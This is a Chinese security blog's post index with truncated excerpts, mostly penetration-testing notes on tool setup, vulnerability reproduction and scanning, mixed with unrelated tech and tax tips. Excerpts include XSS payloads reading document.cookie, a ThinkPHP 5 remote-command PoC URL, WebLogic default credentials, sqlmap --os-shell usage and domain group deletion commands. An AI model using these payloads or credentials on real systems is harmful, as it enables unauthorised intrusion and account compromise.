Bul1et的博客

原创 微软电脑surface键盘无法使用问题解决

微软电脑surface键盘无法使用问题解决

原创 Service电脑出现任务栏点不动

Ctrl+Alt+Del选择任务管理器2.下方任务栏点不动 但是偶尔也可以点动搜索控制面板 打开控制面板3.Ctrl+Alt+Del显示的蓝屏 右下角 网络关闭4.来到桌面右键下方任务栏空白处选择咨询和兴趣->关闭然后重启电脑即可...

原创 Wireshark安装使用

Wireshark工具下载下载解压默认安装即可然后选择你的网卡点击Start抓包即可

原创 Goby安装

Goby下载链接https://wwx.lanzoux.com/b01nqr9bi密码:24jf解压后直接运行Goby.exe即可

原创 Nessus安装失败---提示网卡问题

解决:查看任务管理器未找到应用程序Npcap 0.995然后下载Npcap 0.995.exe下载地址:https://nmap.org/npcap/dist/下载成功 然后安装Npcap 0.995.exe安装之前先禁用掉nessus服务然后安装Npcap 0.995.exe安装成功 重启系统 任务管理器就出现了Npcap 0.995.exe然后访问https://localhost:8834/扫描即可...

原创 Redis未授权访问漏洞

原创 kali使用rz sz命令

首先要安装lrzsz但是kali里面的命令不一样使用命令apt-get install lrzsz安装成功之后sz 文件名 即可导出文件到桌面上

原创 xshell连接kali失败解决方法(附xshell工具)

xshell工具链接：https://pan.baidu.com/s/19EwWXxkMjvEkcGc-F2HDgQ提取码：4owc使用xshell连接kali一直提示，拒绝了你的密码kali需要修改的地方gedit /etc/ssh/sshd_config第一处注释去掉 改为yes第二处注释去掉 改为yesctrl s保存然后然后重启kali开启ssh服务然后xshell连接成功...

原创 心脏滴血漏洞复现

漏洞检测通过扫描器检测到漏洞扫描器地址支持批量扫描链接：https://pan.baidu.com/s/1YW9tVLx1yJbfIVnELbqdsA提取码：m4x3漏洞利用通过kali的msf进行漏洞利用

原创 Burp里面的Alerts模块一直报错抓不到包(解决问题)

今天测试抓包的时候发现一个问题Burp里面的Alerts模块一直报错抓不到包与平时测试不同的是这次我先登录了客户端的VPN然后再去访问测试的web地址地址为192.168...下面是解决问题方法一:把这些全部勾选上 再试试就可以了方法二看看是不是你的代理插件设置了不代理内网地址如果设置了 清除就行了...

原创 设置微信PC端代理使用burp抓取微信小程序的数据包

原创 禁用浏览器的js

谷歌chrome://settings/content/javascript

原创 个人所得税退税问题(个人经验)

这个不是技术贴啊 看看能不能帮到人第一步:下载个人所得税APP第二步:登录账号第三步:绑定银行卡(必须是银行的一类卡)第四步:填写专项附加扣除填报 第五步:申请退税然后就是系统自动给你弄好的数据了 有劳务报酬的记得导入你的劳务报酬这里有个小插曲 我第一次申报的时候发现劳务报酬忘记添加了 所以我选了自行填写 然后就出现了新问题如果你也...

原创 kali验证redis未授权访问提示未找到命令redis-cli

之前装kali可能时间太久远了 每次验证redis未授权访问直接打开kali验证即可，前段时间由于某些原因卸载了kali，等我再装好kali验证redis未授权漏洞时候 一直提示找到命令redis-cli 百度的解决方法查看了好多都是不完整的，比较完整的例如这篇https://www.cnblogs.com/bmjoker/p/9548962.html我说一下我装的流程，希望可以...

原创 关闭本机的445端口

关闭本机笔记本的445端口第一种方法控制面板->windows防火墙->高级设置->入站规则->新建规则->端口->然后下一步选择 阻止连接->留下“公用”即可（这里为了安全我也选了专用）随便给这个规则起个名字如永恒之蓝->保存这种方法好像不太管用下面是第二种方法修改注册表1、运行regedit打开注...

原创 adb interface 驱动问题(保证解决)

今天在测试App的时候，发现手机通过数据线连接电脑的时候出来个adb interface 驱动错误当时就很懵逼 百度找了半天也没找到解决的方法还是需要通过下载一个驱动才行这个驱动可以去我上传的资源下载即可如果你的网速快也可以通过这个链接下载http://adbdriver.com/downloads/下载成功之后 启动exe程序 然后点击安装 ins...

原创 修改content type

Content-Disposition: form-data; name="resumeFile"; filename="11.txt"Content-Type: text/plain

原创 BBScan安装和使用(以及安装遇到的问题)

先下载BBScan压缩包https://github.com/lijiejie/BBScan然后压缩包解压放到Python27目录下(安装py环境)打开本机cmd我们来安装pip下载地址https://pypi.org/project/pip/#files首先下载压缩包 解压 我们放到Python27目录下打开cmd 切换到解压的目录里面然...

原创 利用msf进行端口转发

有时候爆破得到服务弱口令本机却连接不上，此时我们就需要用到端口转发左侧的图是msf进行端口转发右侧重新打开一个终端 去连接转发到本地的端口 -u用户名 -p密码...

原创 关于笔记本插网线识别不出来的解决办法

今天插上网线发现笔记本不能识别，跑到售后去修，原来只是小毛病。自己对照检查场景1看看自己这个是不是禁用了，禁用了就修改为启用场景2右键 计算机->管理->设备管理器->网络适配器看看这些网卡是不是禁用了，禁用了就都打开场景3看看自己的网口里面的线是不是断了，修的话大概80块钱。...

原创 渗透测试中可能需要

各种搜索引擎:https://search.chongbuluo.com/压缩包在线破解：https://www.catpasswd.com/whios|ip查询|端口扫描等：https://viewdns.info/谷歌镜像站：http://ac.scmor.com/临时邮箱：https://bccto.me/免费短信：https://yunduanxin.net/免费接收短信验...

原创 WebLogic wls9-async 反序列化漏洞(详细干货)

前天刚刚爆出了WebLogic wls9-async 反序列化漏洞，大佬们又可以薅羊毛了，这是我的复现过程，仅供参考影响范围Oracle WebLogic Server10.3.6.0.0 Oracle WebLogic Server12.1.3.0.0 Oracle WebLogic Server12.2.1.1.0 Oracle WebLogic Server12.2.1.2.0...

原创 新burp的安装和使用教程

今天在复现一个刚爆出的weblogic漏洞的时候，别人的burp都能证明，唯独我的不行，我还以为是我的POC错误一直在改，但是一直都没有结果。最后复制别的POC都不行这让我怀疑自己破解版的Burp有问题，然后就新装了一个。下面的安装步骤1.下载Burp这个我已经上传到我的附件里面，需要的可以直接下载解压密码是www.vuln.cn2.打开解压文件点击第一个首先点击R...

原创 burp如何设置爆破的时候账号和密码一致

平时在暴力破解的时候，总会遇到这样的问题。比如一个登陆页面，我们知道账号跟密码相同，但是需要字典足够大才能爆破出来，这个时候我一般会选择这样做选择两个变量 选择第四个爆破模块添加同样的字典 top500开始爆破这个也能爆破但是 耗费的时间很多 就像我们前面说的 知道了账号密码的规则 是账号和密码相同 我们这样做相当于循环了 太费时间这里就有个好...

原创 火狐插件FoxyProxy的使用方法

以前自己挖漏洞使用火狐+burp抓包测试，但是每次浏览器开代理老麻烦了今天同事无意间给我提了这个插件FoxyProxy 很实用，下面是使用教程，很直白很详细首先安装火狐插件FoxyProxy然后选择Options开始配置.然后重启浏览器选中Burpsuite 然后打开burp即可抓包关闭的时候也很简单...

原创 测试中被封ip和mac的解决办法

今天在客户这做内网测试，在测试注入的时候触发了防护设备，禁了我的ip，然后我换了一个ip还是不行。最后请教别人才知道防护设备永久禁了我的ip和mac地址，下面就开始改mac地址这个mac地址是我随便在网上找的E8039A352BED然后拔掉网线查看是否改成功ipconfig /all然后插上网线就可以了即可测试...

原创 web常见漏洞(造轮子第一步)

原创 内网渗透命令大全

1.域常用操作命令：net group /domain //获得所有域用户组列表net group qq_group /domain //显示域中qq_group组的成员net group qq_group /del /domain //删除域中qq_group组net group qq_group qq /del /domain //删除域内qq_group 群组中的成员QQnet ...

原创 笔记本插入网线接口没反应

前两天电脑不知怎滴插入网线就是读不出来，这个时候我还以为网线接口处太松了事接触不良不管怎么尝试都没用，百度了没有具体的结果 还有的让拿去修(差点信了)就在我没有一点办法的时候，无意间打开了网络和共享中心找到更改适配器设置选项然后我发现我的本地连接禁用了 我日o启用之后就好了 现在网线正常连接...

原创 爬虫脚本实例

1.中国大学排名#CrawUnivRankingB.pyimport requestsfrom bs4 import BeautifulSoupimport bs4 def getHTMLText(url): try: r = requests.get(url, timeout=30) r.raise_for_status() ...

原创 xss payload大全(实用)

验证xss的时候总感觉姿势不够这下好了   这么多  任你随便插'><script>alert(document.cookie)</script> ='><script>alert(document.cookie)</script> <script>alert(document.cookie)</scrip...

原创 使用Nmap验证漏洞

使用Nmap检测漏洞http拒绝服务nmap --max-parallelism 800--script http-slowloris <target>IIS 短文件泄露nmap -p 8080 --script http-iis-short-name-brute <target>验证http中开启的-methods 方法nmap -T3 --scr...

原创 第一次在Host头处发现了XSS

某天在挖洞时，噼里啪啦一顿信息收集之后发现了个登陆界面如下：抓请求包试着把整个host头的值替换成www.baidu.comhost头的值确实会完全展示在页面中，接下来就是与XSS过滤器的一番殊死搏斗了，payload很简单就被执行了。。。。。。直接在之前的参数后面添加payload: ’;prompt`1`;’(此处省去简单的XSS绕过过程)，重放数据包：刷新前台页面...

原创 Weblogic漏洞之弱口令、任意文件读取、上传shell

转载自:https://blog.csdn.net/qq_29647709/article/details/84930879弱口令环境启动后，访问http://192.168.1.15:7001/console/login/LoginForm.jsp，即为weblogic后台。本环境存在弱口令可以直接登录：weblogic Oracle@123weblogic常用弱口令：...

原创 TP5漏洞

漏洞POC/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami&tdsourcetag=s_pctim_aiomsgPoc2/index.php?s=index/\think\app/invo...

原创 文件包含和文件上传组合拳

Targetwww.xxxxx.com信息搜集(1)端口扫描目标开放端口略(2)探测服务80 web8080 web8088 web(3)路径扫描略(4)漏洞探测通过对web服务进行探测,发现8080端口存在文件包含漏洞,查看回显自动添加了page_前缀和php后缀.使用../来绕过前缀,使用%00来截断后缀构造:(5)8080端口探测到后台发...

原创 sqlmap的--os-shell玩法

首先找到注入点 证明存在注入漏洞然后使用命令sqlmap.py -r D:\1.txt -p username --random-agent --is-dba看看是不是dba这里不是dba所以不能使用--os-shell命令如果是的话例如python sqlmap.py -u http://192.168.0.166/php/newsshow.php?cid=4 -...

转载 渗透测试各种扫描工具集合(好用)

转载自security-360.cn，觉得里面一些信息收集和git的工具挺不错的，可以看看。集合github平台上的安全行业从业者自研开源扫描器的仓库，包括子域名枚举，数据库漏洞扫描，弱口令或信息泄漏扫描，端口扫描，指纹识别以及其他大型扫描器或模块化扫描器。项目地址：https://github.com/We5ter/Scanners-Box子域名枚举扫描器或爆破工具https://gi...

原创 DOM型xss深度剖析

有人说DOM型xss很鸡肋我却不以为然，对于我来说任何漏洞都是有利用价值的。的确DOM型的xss不像反射型xss和存储型xss那样会与后台交互，DOM型xss的实现过程都是在前台介绍两种场景的DOM型xss两种场景都适用的POC#' onclick="alert(111)">或者这个POC#"><img src=@ onerror=alert(1)&g...

原创 nmap扫描语法

nmap -T4 -A -v -Pn 192.168.101.0/24nmap -T4 -A -v -Pn --open 192.168.101.0/24 -oN 111.txtnmap -p- -sV -iL ip.txt -oX result.xmlnmap -p- -sV --open -iL ip.txt -oX result.xml云南nmap -sT -T4...